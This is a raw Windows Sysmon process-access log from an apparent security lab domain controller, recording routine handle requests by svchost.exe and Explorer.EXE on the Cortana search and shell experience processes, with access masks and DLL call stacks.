14:58:36.560{A7A01FEF-B626-607E-0D00-00000000BB01}10083544C:\Windows\system32\svchost.exe{A7A01FEF-C0B1-607E-9B05-00000000BB01}5448C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+1644|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080243Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:36.560{A7A01FEF-B626-607E-0D00-00000000BB01}10083544C:\Windows\system32\svchost.exe{A7A01FEF-C0B1-607E-9B05-00000000BB01}5448C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+1644|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080242Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:36.560{A7A01FEF-B626-607E-0D00-00000000BB01}10083544C:\Windows\system32\svchost.exe{A7A01FEF-C0B1-607E-9B05-00000000BB01}5448C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+1644|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080241Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:36.560{A7A01FEF-B626-607E-0D00-00000000BB01}10083544C:\Windows\system32\svchost.exe{A7A01FEF-C0B1-607E-9B05-00000000BB01}5448C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+1644|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080240Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:36.560{A7A01FEF-B626-607E-0D00-00000000BB01}10083544C:\Windows\system32\svchost.exe{A7A01FEF-C0B1-607E-9B05-00000000BB01}5448C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+1644|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080239Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:36.560{A7A01FEF-B626-607E-0D00-00000000BB01}10083544C:\Windows\system32\svchost.exe{A7A01FEF-C0B1-607E-9B05-00000000BB01}5448C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+1644|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080238Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:36.560{A7A01FEF-B626-607E-0D00-00000000BB01}10083544C:\Windows\system32\svchost.exe{A7A01FEF-C0B1-607E-9B05-00000000BB01}5448C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+1644|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080237Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:36.560{A7A01FEF-B626-607E-0D00-00000000BB01}10083544C:\Windows\system32\svchost.exe{A7A01FEF-C0B1-607E-9B05-00000000BB01}5448C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+1644|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080236Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:36.560{A7A01FEF-B626-607E-0D00-00000000BB01}10083544C:\Windows\system32\svchost.exe{A7A01FEF-C0B1-607E-9B05-00000000BB01}5448C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+1644|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080235Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:36.560{A7A01FEF-B626-607E-0D00-00000000BB01}10083544C:\Windows\system32\svchost.exe{A7A01FEF-C0B1-607E-9B05-00000000BB01}5448C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+1644|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080234Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:36.560{A7A01FEF-B626-607E-0D00-00000000BB01}10083544C:\Windows\system32\svchost.exe{A7A01FEF-C0B1-607E-9B05-00000000BB01}5448C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+1644|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080233Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:36.560{A7A01FEF-B625-607E-0C00-00000000BB01}6684872C:\Windows\system32\svchost.exe{A7A01FEF-C0B1-607E-9B05-00000000BB01}5448C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+74d7|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a384|C:\Windows\SYSTEM32\psmserviceexthost.dll+11055|C:\Windows\SYSTEM32\psmserviceexthost.dll+108cf|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080232Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:36.560{A7A01FEF-B625-607E-0C00-00000000BB01}6684872C:\Windows\system32\svchost.exe{A7A01FEF-C0B1-607E-9B05-00000000BB01}5448C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+489d|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a2ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+11055|C:\Windows\SYSTEM32\psmserviceexthost.dll+108cf|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080231Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:36.560{A7A01FEF-B625-607E-0C00-00000000BB01}6684872C:\Windows\system32\svchost.exe{A7A01FEF-C0B0-607E-9905-00000000BB01}5288C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+489d|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a2ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+11055|C:\Windows\SYSTEM32\psmserviceexthost.dll+108cf|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080230Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:36.560{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-C0B1-607E-9B05-00000000BB01}5448C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+74d7|C:\Windows\SYSTEM32\psmserviceexthost.dll+12fce|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x800000000000000080229Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:36.560{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-C0B1-607E-9B05-00000000BB01}5448C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x800000000000000080228Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:36.560{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-C0B0-607E-9905-00000000BB01}5288C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x800000000000000080227Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:36.560{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-C0B1-607E-9B05-00000000BB01}5448C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+739b|C:\Windows\SYSTEM32\psmserviceexthost.dll+ae34|C:\Windows\SYSTEM32\psmserviceexthost.dll+7bae|C:\Windows\SYSTEM32\psmserviceexthost.dll+12141|C:\Windows\SYSTEM32\psmserviceexthost.dll+170e8|C:\Windows\SYSTEM32\resourcepolicyserver.dll+12326|C:\Windows\SYSTEM32\resourcepolicyserver.dll+bac5|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080226Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:36.560{A7A01FEF-C0A6-607E-8105-00000000BB01}8365152C:\Windows\Explorer.EXE{A7A01FEF-C0B1-607E-9B05-00000000BB01}5448C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d319|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080225Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:36.560{A7A01FEF-C0A6-607E-8105-00000000BB01}8365580C:\Windows\Explorer.EXE{A7A01FEF-C0B1-607E-9B05-00000000BB01}5448C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+109196|C:\Windows\System32\TwinUI.dll+82af7|C:\Windows\System32\TwinUI.dll+beb2e|C:\Windows\System32\TwinUI.dll+beaf9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080224Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:36.560{A7A01FEF-C0A6-607E-8105-00000000BB01}8365580C:\Windows\Explorer.EXE{A7A01FEF-C0B1-607E-9B05-00000000BB01}5448C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+109196|C:\Windows\System32\TwinUI.dll+82af7|C:\Windows\System32\TwinUI.dll+beb2e|C:\Windows\System32\TwinUI.dll+beaf9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080223Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:36.560{A7A01FEF-C0A6-607E-8105-00000000BB01}8366044C:\Windows\Explorer.EXE{A7A01FEF-C0B1-607E-9B05-00000000BB01}5448C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+57c95|C:\Windows\System32\TwinUI.dll+37528|C:\Windows\System32\TwinUI.dll+37448|C:\Windows\System32\TwinUI.dll+38893|C:\Windows\System32\TwinUI.dll+36e6d|C:\Windows\System32\TwinUI.dll+36c71|C:\Windows\System32\TwinUI.dll+3fb990|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+64ddc|C:\Windows\System32\combase.dll+64a92|C:\Windows\System32\combase.dll+633a8|C:\Windows\System32\combase.dll+6180f|C:\Windows\System32\combase.dll+6080f|C:\Windows\System32\combase.dll+5df06|C:\Windows\System32\combase.dll+5d6ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0 10341000x800000000000000080222Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 